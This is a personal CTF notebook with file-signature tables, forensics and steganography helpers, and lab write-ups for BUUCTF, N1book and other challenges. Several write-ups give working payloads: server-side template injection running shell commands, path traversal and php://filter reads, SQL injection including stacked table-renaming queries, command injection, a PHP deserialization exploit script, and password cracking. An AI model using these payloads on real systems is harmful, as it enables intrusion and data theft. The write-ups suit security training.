CTF Note

常见文件头部 Magic Bytes

描述扩展名Magic Number
Adobe Illustrator.ai25 50 44 46 [%PDF]
Bitmap graphic.bmp42 4D [BM]
Class File.classCA FE BA BE
JPEG graphic file.jpgFF D8
JPEG 2000 graphic file.jp20000000C6A5020200D0A [….jP..]
GIF graphic file.gif47 49 46 38 [GIF89]
TIF graphic file.tif49 49 [II]
PNG graphic file.png89 50 4E 47 .PNG
WAV audio file.wav52 49 46 46 RIFF
ELF Linux EXE.elf7F 45 4C 46 .ELF
Photoshop Graphics.psd38 42 50 53 [8BPS]
Windows Meta File.wmfD7 CD C6 9A
MIDI file.mid4D 54 68 64 [MThd]
Icon file.ico00 00 01 00
MP3 file with ID3 identity tag.mp349 44 33 [ID3]
AVI video file.avi52 49 46 46 [RIFF]
Flash Shockwave.swf46 57 53 [FWS]
Flash Video.flv46 4C 56 [FLV]
Mpeg 4 video file.mp400 00 00 18 66 74 79 70 6D 70 34 32 [….ftypmp42]
MOV video file.mov6D 6F 6F 76 [….moov]
Windows Video file.wmv30 26 B2 75 8E 66 CF
Windows Audio file.wma30 26 B2 75 8E 66 CF
PKZip.zip50 4B 03 04 [PK]
GZip.gz1F 8B 08
Tar file.tar75 73 74 61 72
Microsoft Installer.msiD0 CF 11 E0 A1 B1 1A E1
Object Code File.obj4C 01
Dynamic Library.dll4D 5A [MZ]
CAB Installer file.cab4D 53 43 46 [MSCF]
Executable file.exe4D 5A [MZ]
RAR file.rar52 61 72 21 1A 07 00 [Rar!…]
SYS file.sys4D 5A [MZ]
Help file.hlp3F 5F 03 00 [?_..]
VMWare Disk file.vmdk4B 44 4D 56 [KDMV]
Outlook Post Office file.pst21 42 44 4E 42 [!BDNB]
PDF Document.pdf25 50 44 46 [%PDF]
Word Document.docD0 CF 11 E0 A1 B1 1A E1
RTF Document.rtf7B 5C 72 74 66 31 [{ tf1]
Excel Document.xlsD0 CF 11 E0 A1 B1 1A E1
PowerPoint Document.pptD0 CF 11 E0 A1 B1 1A E1
Visio Document.vsdD0 CF 11 E0 A1 B1 1A E1
DOCX (Office 2010).docx50 4B 03 04 [PK]
XLSX (Office 2010).xlsx50 4B 03 04 [PK]
PPTX (Office 2010).pptx50 4B 03 04 [PK]
Microsoft Database.mdb53 74 61 6E 64 61 72 64 20 4A 65 74
Postcript File.ps25 21 [%!]
Outlook Message File.msgD0 CF 11 E0 A1 B1 1A E1
EPS File.eps25 21 50 53 2D 41 64 6F 62 65 2D 33 2E 30 20 45 50 53 46 2D 33 20 30
Jar File.jar50 4B 03 04 14 00 08 00 08 00
SLN File.sln4D 69 63 72 6F 73 6F 66 74 20 56 69 73 75 61 6C 20 53 74 75 64 69 6F 20 53 6F 6C 75 74 69 6F 6E 20 46 69 6C 65
Zlib File.zlib78 9C
SDF File.sdf78 9C

python各版本对应的magic头

Python 2.7|03f30d0a 00000000
Python 3.0|3b0c0d0a 00000000
Python 3.1|4f0c0d0a 00000000
Python 3.2|6c0c0d0a 00000000
Python 3.3|9e0c0d0a 00000000 00000000
Python 3.4|ee0c0d0a 00000000 00000000
Python 3.5|170d0d0a 00000000 00000000
Python 3.6|330d0d0a 00000000 00000000
Python 3.7|420d0d0a 00000000 00000000 00000000
Python 3.8|550d0d0a 00000000 00000000 00000000
Python 3.9|610d0d0a 00000000 00000000 00000000
Python 3.10|6f0d0d0a 00000000 00000000 00000000

Mics 思维导图

ctf-杂项-思维导图

ASCII表

ascii

dagger alphabet

image-20230714003015911

Use wireshark filter data

http.request.method == POST and http contains “admin”
ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107 and ip.addr == 192.168.1.107
tcp.port == 80 and udp.dstport == 80 or tcp.srcport <= 10000
tcp|udp|arp|icmp|http|smtp|ftp|dns|msnms|ip|ssl|not oicq|!bootp
eth.dst == A0:00:00:04:C5:84 and eth.src eq A0:00:00:04:C5:84 or eth.addr eq A0:00:00:04:C5:84
http.request.method == “GET” or http.request.method == “POST”
http.request.uri == “/img/logo-edu.gif” or http.request.uri contains “/img/logo-edu.gif” or http contains “GET”

Use ctf-party

require 'ctf_party'
require 'base64'
'''
base64: to_b64, from_b64, b64? and bang versions
digest: md5, sha1, etc. and bang versions
flag: flag, flag!, flag? (apply/check a flag format)
rot: rot, rot13, rot_all and bang versions
hex: hex2dec, dec2hex, to_hex, from_hex, str2hex, hex2str, hex2bin, bin2hex, from_hexip, to_hexip and bang versions
case: randomcase, alternatecase and bang versions
cgi: urlencode, urlencode_component, urldecode, urldecode_component, htmlescape, htmlunescape and bang versions
bin: to_bin, from_bin, str2bin, bin2str, hex2bin, bin2hex and bang versions
leet: leet and bang version
dec: dec2str, str2dec, hex2dec, dec2hex and bang versions
xor: ulxor, alxor, urxor, arxor and bang versions
misc: istrip and bang version
'''
flag = 'flag{xs}'
p Base64.strict_encode64(flag)
p flag.flag?
p flag.to_b64!
p 'SGVsbG8gd29ybGQh'.b64?
p 'mystr'.rot13
p 'mystr'.rot(shift: 11)
p 'mystr'.sha2_512
p "flag".to_bin
p "https://xinghuo.xfyun.cn/desk".urlencode_component
# 定义一个数组
arr = [1, 2, 3, 4, 5]
# 使用 for 循环遍历数组
for i in 0..arr.length-1
# 如果 i 是偶数,打印 arr[i]
if i % 2 == 0
# p arr[i]
end
end

Use dd

dd if=源文件名 bs=1 skip=开始分离的字节数 of=目标文件名
#参数说明:
if=file #输入文件名,缺省为标准输入。
of=file #输出文件名,缺省为标准输出。
bs=bytes #同时设置读写块的大小为 bytes ,可代替 ibs 和 obs 。
skip=blocks #从输入文件开头跳过 blocks 个块后再开始复制。</hr>
#以IDF实验室“抓到一只苍蝇”为例,需要将获得的文件去除前364个字节:
dd if=s1 bs=1 skip=364 of=d1</hr>
#使用dd命令分离文件格式如下:
dd if=源文件名 bs=1 skip=开始分离的字节数 of=目标文件名

文件合并

#将所有以chapter开头的文件按文件名从小到大的顺序合并,输出到book文件中
cat chapter01 chapter02 chapter03 > book

file headers

#![allow(unused)]
fn main() {
let header_vec = vec![
("JPEG","FFD8FFE1"),
("png","89504E47"),
("gif","47494638"),
("tiff","49492A00"),
("bmp","424DC001"),
("zip","504B304"),
("rar","52617221"),
("psd","38425053"),
("rtf","785C727466"),
("xml","3C3F786D6C"),
("html","68746D6C3E"),
("pdf","2550444662D312E"),
("wav","57415645"),
("pcap","4D3C2B1A"),
];
}

Image RGB 分层

[dependencies]
image = "0.23"
#![allow(unused)]
fn main() {
fn fen_rgb_ceng() {
// 载入原始图片并获取宽度和高度
let img = image::open("xx_00029.png").unwrap();
let (width, height) = img.dimensions();
// 创建三个空白的 Rgb 图层
let mut layer1 = image::RgbImage::new(width, height);
let mut layer2 = image::RgbImage::new(width, height);
let mut layer3 = image::RgbImage::new(width, height);
// 将原始图片中的像素值分离到三个图层中
for y in 0..height {
for x in 0..width {
let pixel = img.get_pixel(x, y);
layer1.get_pixel_mut(x, y).0[0] = pixel.0[0];
layer2.get_pixel_mut(x, y).0[1] = pixel.0[1];
layer3.get_pixel_mut(x, y).0[2] = pixel.0[2];
}
}
// 显示三个图层
layer1.save("output_layer1.png").unwrap();
layer2.save("output_layer2.png").unwrap();
layer3.save("output_layer3.png").unwrap();
}
}

get RGBA vec

#![allow(unused)]
fn main() {
let image = image::open("xx_00034.png").unwrap();
let (width, height) = image.dimensions();
let mut rgba_vec:Vec<(u8,u8,u8,u8)> = vec![];
let mut buf :Vec<u8> = vec![];
for y in 0..height {
for x in 0..width {
let pixel = image.get_pixel(x, y);
let rgba = pixel.0;
if (rgba[0] ==254 &&rgba[1] ==254 &&rgba[2] ==254)||(rgba[0] ==0 &&rgba[1] ==0 &&rgba[2] ==0) {
rgba_vec.push((rgba[0],rgba[1],rgba[2],rgba[3]));
}
}
}
}

create image from RGBA vec

#![allow(unused)]
fn main() {
fn create_image_from_rgba_vec(rgba_vec: Vec<(u8, u8, u8, u8)>) {
let width = f64::sqrt(rgba_vec.len() as f64) as u32;
let height = f64::sqrt(rgba_vec.len() as f64) as u32;
// 创建一张空白图片
let mut img: ImageBuffer<Rgba<u8>, Vec<_>> = ImageBuffer::new(width, height);
// 将 rgba_vec 中的颜色填充到图片上
for y in 0..height {
for x in 0..width {
let i = (y * width + x) as usize;
let rgba = rgba_vec[i];
img.get_pixel_mut(x, y).0 = [rgba.0, rgba.1, rgba.2,rgba.3];
}
}
// 保存图片
img.save("output.png").unwrap();
}
}

RSA 参数解释

RSA,使用公钥与私钥配对来进行加密和解密。其中,p、q 是两个大素数,n=pq,f(n)=(p-1)(q-1) 是欧拉函数值,e 是与 f(n) 互质的整数,d 是满足 e*d≡1(mod f(n)) 的整数,m 是明文,c 是密文

ccompress and decompress zlib

import zlib
# 压缩数据
data = b'Hello, world!'
compressed_data = zlib.compress(data)
print('Compressed data:', compressed_data)
# 解压数据
uncompressed_data = zlib.uncompress(compressed_data)
print('Uncompressed data:', uncompressed_data)

Simple_SSTI_1

# %27 means '
# %20 means space
http://114.67.175.224:11296/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

Simple_SSTI_2

http://114.67.175.224:16482/?flag={{config}}
flag{46fe7552dcee5c1bba675349353506d5}

Flask_FileUpload

1.echo "import os\nos.system('cat ./flag')" > get_floag.txt
2.mv get_flag.txt get_flag.jpg
3.upload get_flag.jpg
flag{e58da7f2b3307deb9eb1d276cb8d524a}

Simple image

download the image
1.mv image.png image.html
2.cat image.html
3.get "107;&#101;&#121;&#123;&#121;&#111;&#117;&#32;&#97;&#114;&#101;&#32;&#114;&#105;&#103;&#104;&#116;&#125" to Vec<u8>
4.decode Vec<u8> to string get key{you are right}

shihua Write up

1.  hxxx Flag:flag{flag_in_hexdecimal:)} 3.  map Flag:flag{mapisthekey} 4.  bxxwxx Flag:ctf{show_me_the_money}

binwalk -e bxxwxx
cd _bxxwxx.extracted
cat flag.txt

5.  Zip0 Flag:flag{pseudo_encryption}

use imhex open zip0.zip
remove password
save zip0.zip
open flag.png

6.  sxxxhxxx flag:ctf{welcom_to_upc_im}

steghide extract -sf stxxhxxx.jpeg
cat info

7.  Caesar Flag:flag{this_is_rot_14:)} 8.  Vig Flag:flag{vigenere_cipher} 9.  xor Flag:flag{flag1sxor} 10.  Easyre Flag:flag{this_Is_a_EasyRe}

BUUCTF

Linux Labs 1

1.run "ssh -p 29381 root@node4.buuoj.cn" to connect ssh
2.enter password 123456
3.cd ..
4.cat flag.txt
flag{374920b5-66a9-4779-9172-5176eae58b85}

BUU LFI COURSE 1

http://81402a4e-a4c6-493f-b96e-8bf140d81bec.node4.buuoj.cn:81/?file=../../../flag
flag{241f21aa-3d5b-4540-9afb-3d1fd7da9197}

BUU BRUTE 1

url = "http://d1c5dde5-7e42-4f0a-a0a4-464717740958.node4.buuoj.cn:81/?username=admin&password={1000..10000}"
1.for loop get body
2.if body contains("flag") println body

BUU SQL COURSE 1

1. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(username)%20from%20admin) to get username
2. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(password)%20from%20admin) to get user password
3. enter username and password clock login to see flag

[极客大挑战 2019]EasySQL

username:admin' or 1=1#
password:123456
flag{331c23f4-983a-4a29-b38a-d9c93b1734f2}

[HCTF 2018]WarmUp

1. ? URL ecode => %3F
2. %3F URL ecode => %253F
3. open url to get flag http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php%253F../../../../../ffffllllaaaagggg
4. or open http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php?../../../../../ffffllllaaaagggg

[极客大挑战 2019]Havefun

1.open source code cansee this
`
<!--
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}
-->
`
2. parse cat param http://352c414e-7254-40cc-b802-f66498fc1bd4.node4.buuoj.cn:81/?cat=dog get flag

[ACTF2020 新生赛]Include

1. click tip to open http://4237a679-489a-465c-9936-d7b0d68aba04.node4.buuoj.cn:81/?file=flag.php
2. open hackbar load url and change ?file=flag.php to ?file=php://filter/read=convert.base64-encode/resource=flag.php
3. copy base64 and open base_64.py decode base64 can see flag

[ACTF2020 新生赛]Exec

1.enter 127.0.0.1;ls click Enter can see we can run cmd
2.enter 127.0.0.1;ls ../../../;cat ../../../flag  can get flag
flag{8d209996-9c2b-48e8-bdac-3b6ae15fb98b}

[强网杯 2019]随便注

1. enter "1';show databases#" and click submit can se all databases
2. enter "1';use supersqli;show tables#" and click submit canse all tables in supersqli
3. enter "1';use supersqli;show columns from `1919810931114514`#" and click submit
4. enter "1';use supersqli;show columns from words#" and click submit
5. enter "1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#" and click submit
6. enter "1' or 1=1#" an click can see flag

[GXYCTF2019]Ping Ping Ping25

1. URL/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php see source code cansee flag

[SUCTF 2019]EasySQL

1. enter "1;show databases;"
2. "1;show tables;"
3. "1;set sql_mode=pipes_as_concat;select 1"

MD5

https://buuoj.cn/challenges#MD5
1.unzip file and open .txt copy md5 code
2.open https://www.bejson.com/enc/md5dsc/ tp decode MD5 code
flag{admin1}

一眼就解密

https://buuoj.cn/challenges#%E4%B8%80%E7%9C%BC%E5%B0%B1%E8%A7%A3%E5%AF%86
1.canse it's a base64 code
2.so decode base64 can get the flag

Url编码

1.unzip file and open .txt copy url code
1.can find that is a URL encoded
2.so decode the code
flag{and 1=1}

看我回旋踢

1.unzip file and open .txt copy url code
1.can find that is a synt encoded 凯撒密码
2.so decode the code use python/caesar_cipher.py
flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1}

摩丝

1. unzip file and open .txt copy morse code
2. decode morse code with rust can get the flag
flag{ILOVEYOU}

password

1. unzip file and open .txt
2. can see the kay is 10 letter
3. so 张三 to zs and key{zs19900315}
flag{zs19900315}

[极客大挑战 2019]Secret File

1. open and view page source
2. open URL/Archive_room.php and view page source
3. copy URL/action.php open 3 times
4. open fiddler click  URL/action.php can see
`
<!DOCTYPE html>
<html>
<!--
secr3t.php
-->
</html>
`
5. open URL/secr3t.php can see flag.php but can't see it
6. so open URL/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
7. decode base64 can get flag
flag{9835de9d-5d61-4551-9b44-0c1955464828}

[极客大挑战 2019]LoveSQL

1. open URL/check.php?username=admin' or '1'='1&password=1
2. open URL/check.php?username=1' union select 1,2,3%23&password=1
3. open URL/check.php?username=1' union select 1,database(),version()%23&password=1
4. open URL/check.php?username=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 %23&password=1  get geekuser is password
5. open URL /check.php?username=1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from geek.l0ve1ysq1 %23&password=1
os open /check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
can see flag

N1book 题目

第一章Web 第一题

本测试题来自N1BOOK,考察常见的信息收集能力。flag被分割成3块,藏在3处,你能都找出来么?

dirsearch -u http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/

image-20230605120217241 open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/flag1_is_her3_fun.txt get flag1 flag{info_1

#get flag3
vim -r index.php.swp
# p0rtant_hack}

image-20230605115957399 open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/index.php~ get flag2 s_v3ry_im flag{info_1s_v3ry_imp0rtant_hack}

CTF 初赛 WriteUP

1 签到

strings qiandao.bmp

image-20230606161057495 flag{c545574d-9ce4-4ce7-997c-1f281d54a7c2}

2 ARP-1

分析流量包发现只有一个字母变化 image-20230606162223573 flag{2cbd116b-5fe9-4252-b9d9-7d794a519d59}

5 cc_1

已知 image-20230606161312058 点击魔法棒 image-20230606161517274 得到flag image-20230606161605814 flag{e84a3130-c4b9-492c-9ab2-d395a43cbc31}

8 re_ez

用ghidra打开re1.exe,经过分析发现在.data section存在一下数据

// .data
// ram:14002a000-ram:14002a1ff
//
DAT_14002a000          XREF[1]:     14000024c(*)
14002a000 01              ??         01h
14002a001 00              ??         00h
14002a002 00              ??         00h
14002a003 00              ??         00h
14002a004 00              ??         00h
14002a005 00              ??         00h
14002a006 00              ??         00h
14002a007 00              ??         00h
14002a008 01              ??         01h
14002a009 00              ??         00h
14002a00a 00              ??         00h
14002a00b 00              ??         00h
14002a00c 00              ??         00h
14002a00d 00              ??         00h
14002a00e 00              ??         00h
14002a00f 00              ??         00h
14002a010 01              ??         01h
14002a011 00              ??         00h
14002a012 00              ??         00h
14002a013 00              ??         00h
14002a014 01              ??         01h
14002a015 00              ??         00h
14002a016 00              ??         00h
14002a017 00              ??         00h
14002a018 00              ??         00h
14002a019 00              ??         00h
14002a01a 00              ??         00h
14002a01b 00              ??         00h
14002a01c 01              ??         01h
14002a01d 00              ??         00h
14002a01e 00              ??         00h
14002a01f 00              ??         00h
14002a020 00              ??         00h
14002a021 00              ??         00h
14002a022 00              ??         00h
14002a023 00              ??         00h
14002a024 01              ??         01h
14002a025 00              ??         00h
14002a026 00              ??         00h
14002a027 00              ??         00h
14002a028 01              ??         01h
14002a029 00              ??         00h
14002a02a 00              ??         00h
14002a02b 00              ??         00h
14002a02c 00              ??         00h
14002a02d 00              ??         00h
14002a02e 00              ??         00h
14002a02f 00              ??         00h
14002a030 01              ??         01h
14002a031 00              ??         00h
14002a032 00              ??         00h
14002a033 00              ??         00h
14002a034 00              ??         00h
14002a035 00              ??         00h
14002a036 00              ??         00h
14002a037 00              ??         00h
14002a038 01              ??         01h
14002a039 00              ??         00h
14002a03a 00              ??         00h
14002a03b 00              ??         00h
14002a03c 01              ??         01h
14002a03d 00              ??         00h
14002a03e 00              ??         00h
14002a03f 00              ??         00h
14002a040 00              ??         00h
14002a041 00              ??         00h
14002a042 00              ??         00h
14002a043 00              ??         00h
14002a044 00              ??         00h
14002a045 00              ??         00h
14002a046 00              ??         00h
14002a047 00              ??         00h
14002a048 00              ??         00h
14002a049 00              ??         00h
14002a04a 00              ??         00h
14002a04b 00              ??         00h
14002a04c 01              ??         01h
14002a04d 00              ??         00h
14002a04e 00              ??         00h
14002a04f 00              ??         00h
14002a050 01              ??         01h
14002a051 00              ??         00h
14002a052 00              ??         00h
14002a053 00              ??         00h
14002a054 01              ??         01h
14002a055 00              ??         00h
14002a056 00              ??         00h
14002a057 00              ??         00h
14002a058 01              ??         01h
14002a059 00              ??         00h
14002a05a 00              ??         00h
14002a05b 00              ??         00h
14002a05c 01              ??         01h
14002a05d 00              ??         00h
14002a05e 00              ??         00h
14002a05f 00              ??         00h
14002a060 01              ??         01h
14002a061 00              ??         00h
14002a062 00              ??         00h
14002a063 00              ??         00h

由于提示迷宫为5*5,把上面的数据每五个一组,得到下面的数据

1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 0000 0000 1000
1000 1000 1000 1000 1000

在伪代码 sub_140001130()函数发现了 image-20230608145330026 把后面的零去掉得到

1 0 1 0 1    #左上0是迷宫入库,右上0是迷宫出口
1 0 1 0 1
1 0 1 0 1
1 0 0 0 1
1 1 1 1 1
#	 “	 !	  space
上	下	左	 右
得到
"""spacespace### =>"""  ###

ghidra 看strings发现flag是迷宫的md5值 image-20230606165635939 得到 image-20230606170144258 flag{c4eb11b0e0a3cbeed7df057deaec18aa}

just serialize

task.php

<?php
show_source(__FILE__);
class Secret
{
public $filename;
public function __construct($filename)
{
$this->filename = $filename;
}
public function __toString()
{
$num = count(scandir($this->filename));
if ($num > 0) {
return '什么也没有';
} else {
return 'flag_';
}
}
}
class Read
{
public $text = '什么东西';
public function __destruct()
{
echo $this->text;
}
}
$a = unserialize($_GET['p']);

paylaod.php

<?php
class Secret
{
public $filename;
}
class Read
{
public $text;
}
$a = new Read();
$b = new Secret();
$b->filename = "glob://flag_xxskxnsknxakbsx.txt.*";
$a->text =$b;
echo "\n";
echo serialize($a);
// O:4:"Read":1:{s:4:"text";O:6:"Secret":1:{s:8:"filename";s:33:"glob://flag_xxskxnsknxakbsx.txt.*";}}
?>

exp.py

import requests
import string
from urllib.parse import quote
pwd = string.ascii_lowercase + string.digits
S = 'abcdefghijklmnopqrstuvwxyz0123456789.'
url = "http://127.0.0.1:7777/task.php"
payload = '?p=O:4:"Read":1:{{s:4:"text";O:6:"Secret":1:{{s:8:"filename";s:{}:"{}";}}}}'
url += payload
if __name__ == "__main__":
flag = 'glob://flag_'
while len(flag)<40:
for i in S:
tmp = flag + i + '*'
r = requests.get(url.format(len(tmp), tmp))
if 'flag_' not in r.text[-50:]:
flag += i
break
print(flag)

exp.rs

#![allow(unused)]
fn main() {
use crate::http;
pub fn just_serialize(){
let alphabet = "abcdefghijklmnopqrstuvwxyz0123456789.";
let url = "http://127.0.0.1:7777/task.php";
let mut flag = "glob://flag_".to_string();
while flag.len() < 50 {
for i in alphabet.chars(){
let temp = format!("{}{}*",flag,i);
let url = format!("{}?p=O:4:\"Read\":1:{{s:4:\"text\";O:6:\"Secret\":1:{{s:8:\"filename\";s:{}:\"{}\";}}}}",url,temp.len(),temp);
let r = http::get(&url).expect("");
if !r.1.ends_with("flag_") {
flag.push(i);
break;
}
}
println!("{}",flag);
}
}
}

流量分析实战

filter http 发现 有两个可疑文件 image-20230608170605207 image-20230608170545618 导出这两个php image-20230608171015744 image-20230608171049710

image-20230608171116488

复制粘贴到01editor 保存为demo.zip image-20230609122944950 破解得到密码为hackerme8888 解压得到flag.txt flag{2c094ea0-088c-440e-b6da-472e1bec6239}

spiral 螺旋矩阵

已知图片spiral.png spiral image-20230609154832720 解密base64得到: flag{fake_flag} But RGBA色彩空间缺一不可哦~ 我教你还原:aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI=

echo aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI= | base64 -d

https://blog.csdn.net/GW_wg/article/details/120406192 根据图片得到了图片加密的代码task.py

def function(n):
matrix = [[0] * n for _ in range(n)]
number = 1
left, right, up, down = 0, n - 1, 0, n - 1
while left < right and up < down:
# 从左到右
for i in range(left, right):
matrix[up][i] = number
number += 1
# 从上到下
for i in range(up, down):
matrix[i][right] = number
number += 1
# 从右向左
for i in range(right, left, -1):
matrix[down][i] = number
number += 1
for i in range(down, up, -1):
matrix[i][left] = number
number += 1
left += 1
right -= 1
up += 1
down -= 1
# n 为奇数的时候,正方形中间会有个单独的空格需要单独填充
if n % 2 != 0:
matrix[n // 2][n // 2] = number
return matrix

写出下面的代码exp.py

from PIL import Image
def spiral_order(matrix):
if not matrix:
return []
result = []
while matrix:
result.extend(matrix.pop(0))
if matrix and matrix[0]:
for row in matrix:
result.append(row.pop())
if matrix:
result.extend(matrix.pop()[::-1])
if matrix and matrix[0]:
for row in matrix[::-1]:
result.append(row.pop(0))
return result
def reconstruct_image(image_path):
# 打开图片
image = Image.open(image_path)
# 转换为RGBA模式
image_rgba = image.convert("RGBA")
# 获取图片像素数据
pixel_data = list(image_rgba.getdata())
# 获取图片宽度和高度
width, height = image.size
# 将像素数据重新排列为二维矩阵
matrix = [pixel_data[i * width:(i + 1) * width] for i in range(height)]
# 获取螺旋矩阵还原后的像素顺序
spiral_order_pixels = spiral_order(matrix)
# 创建新的图片对象
new_image = Image.new("RGBA", (width, height))
new_image.putdata(spiral_order_pixels)
# 显示图片
new_image.show()
# new_image.sage("new.png")
# 示例用法
reconstruct_image("spiral.png")

把代码形成的new.png 用stegsolve打开 image-20230609155622535 在alpha通道得到了密码:mUv8vvGRMNK5mgbxPNsH 用密码解压得到flag image-20230609160056361

IchunqiuCTF

Quoted-printable

1.unzip file and open .txt copy text code
2.use quoted_printable_cli -d text to decode
flag{那你也很棒哦}

zero_one

ctf-party "01001100011010010011000" from_bin

RSA

1.use rsa.py get d

Wiener’s RSA Attack

import gmpy2
import libnum
def continuedFra(x, y):
"""计算连分数
:param x: 分子
:param y: 分母
:return: 连分数列表
"""
cf = []
while y:
cf.append(x // y)
x, y = y, x % y
return cf
def gradualFra(cf):
"""计算传入列表最后的渐进分数
:param cf: 连分数列表
:return: 该列表最后的渐近分数
"""
numerator = 0
denominator = 1
for x in cf[::-1]:
# 这里的渐进分数分子分母要分开
numerator, denominator = denominator, x * denominator + numerator
return numerator, denominator
def solve_pq(a, b, c):
"""使用韦达定理解出pq,x^2−(p+q)∗x+pq=0
:param a:x^2的系数
:param b:x的系数
:param c:pq
:return:p,q
"""
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):
"""计算列表所有的渐近分数
:param cf: 连分数列表
:return: 该列表所有的渐近分数
"""
gf = []
for i in range(1, len(cf) + 1):
gf.append(gradualFra(cf[:i]))
return gf
def wienerAttack(e, n):
"""
:param e:
:param n:
:return: 私钥d
"""
cf = continuedFra(e, n)
gf = getGradualFra(cf)
for d, k in gf:
if k == 0: continue
if (e * d - 1) % k != 0:
continue
phi = (e * d - 1) // k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return d
n= 68781015120012754009149819243839432182753699533745468739333557116438115901358573880902197723852823949505376140916570536753019491036629572363854637530919546688901226752085109196549145599781909847664046508960094447692268230516763088293911965638780888720788954194778424857089535187609738198309161969913567107861
e= 54093680529782962282616750547542407544796590039913570980901028264103594185617926725669901283009540557359666956131385125727959502505561517117179644650419753631214251337533961664493198676862110639584202010794500844074619335752668896589407110076134931918634061631574656816488381501901503924226166074238518619869
c= 30443384983816710270001651296607959522389400057103143909277631290995899073895621701281106228069835965181342091582584186637031613250922961166298411359757600825556083868477673357860585539016515776933117915504873987178857740106223631465737111746470236003857656528610755145017342412306680097140732745012583119076
d=wienerAttack(e, n)
m=pow(c, d, n)
print(libnum.n2s(m).decode())

Windows系统密码

1. open https://www.bejson.com/enc/md5dsc/ decode MD5
2.can get good-luck

二维码

1. cat qr_code.png 发现了4number.txt,还有一些PK值,敏感想到可能隐藏了一个zip压缩包(zip的创始人名字简写为PK)和4number.txt文件
2. binwalk qr_code.png 结果如下,检测出图片中存在压缩包
3. foremost qr_code.png 分离压缩包 进入output 文件夹 有加密的 00000000.zip
4. fcrackzip -b -c 1 -l 4-4 -u 00000000.zip 找到密码为7639 打开.txt 有flag
flag{vjpw_wnoei}
1. hexdump -C qr_code.png
2. binwalk -e qr_code.png 分离压缩包
3. cd qr_code.png.extrackted
4. zip2john 1d7.zip >> hash
5. john hash --show
flag{vjpw_wnoei}
# 隐藏
# hidden.txt是要隐藏的文件, demo.jpg是用来隐藏信息的图片, out.jpg是有隐藏信息的图片
outguess -k "my secret key" -d hidden.txt demo.jpg out.jpg
# 提取
outguess -k "my secret key" -r out.jpg hidden.txt
# 隐藏数据 To embed emb.txt in cvr.jpg
steghide embed -cf cvr.jpg -ef emb.txt
# 提取数据 To extract embedded data from stg.jpg
steghide extract -sf stg.jpg

stxxhxxx

flag:ctf{welcom_to_upc_im}
1. steghide extract -sf stxxhxxx.jpeg
2. cat info

rar

use  rust buuctf::solutions::fcreack_rar().await; to force crack password

Dangerous RSA

def Dangerous_RSA():
e = 0x3
n = 0x52d483c27cd806550fbe0e37a61af2e7cf5e0efb723dfc81174c918a27627779b21fa3c851e9e94188eaee3d5cd6f752406a43fbecb53e80836ff1e185d3ccd7782ea846c2e91a7b0808986666e0bdadbfb7bdd65670a589a4d2478e9adcafe97c6ee23614bcb2ecc23580f4d2e3cc1ecfec25c50da4bc754dde6c8bfd8d1fc16956c74d8e9196046a01dc9f3024e11461c294f29d7421140732fedacac97b8fe50999117d27943c953f18c4ff4f8c258d839764078d4b6ef6e8591e0ff5563b31a39e6374d0d41c8c46921c25e5904a817ef8e39e5c9b71225a83269693e0b7e3218fc5e5a1e8412ba16e588b3d6ac536dce39fcdfce81eec79979ea6872793
c = 0x10652cdfaa6b63f6d7bd1109da08181e500e5643f5b240a9024bfa84d5f2cac9310562978347bb232d63e7289283871efab83d84ff5a7b64a94a79d34cfbd4ef121723ba1f663e514f83f6f01492b4e13e1bb4296d96ea5a353d3bf2edd2f449c03c4a3e995237985a596908adc741f32365
k = 0
while 1:
res = iroot(c+k*n,e)  #c+k*n 开3次方根 能开3次方即可
#print(res)
#res = (mpz(13040004482819713819817340524563023159919305047824600478799740488797710355579494486728991357), True)
if(res[1] == True):
print(libnum.n2s(int(res[0]))) #转为字符串
break
k=k+1
Dangerous_RSA()

RSA flag.enc pub.key

1. openssl rsa -pubin -in pub.key -text -modulus
2. convert to decimal n = int("C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD",16)
3. factordb 86934482296048119190666062003494800588905656017203025617216654058378322103517
4. p = 285960468890451637935629440372639283459
5. q = 304008741604601924494328155975272418463
6. e = 65537
import gmpy2
import rsa
n = int("C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD",16)
p = 285960468890451637935629440372639283459
q = 304008741604601924494328155975272418463
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open("./flag.enc", "rb+") as f:
f = f.read()
print(rsa.decrypt(f, key))
flag{decrypt_256}

这个压缩包有点麻烦

fcrackzip -b -c 1 -l 6-6 -u attachment.zip =>483279
open windows crack by password-note.txt and 解压flag.zip
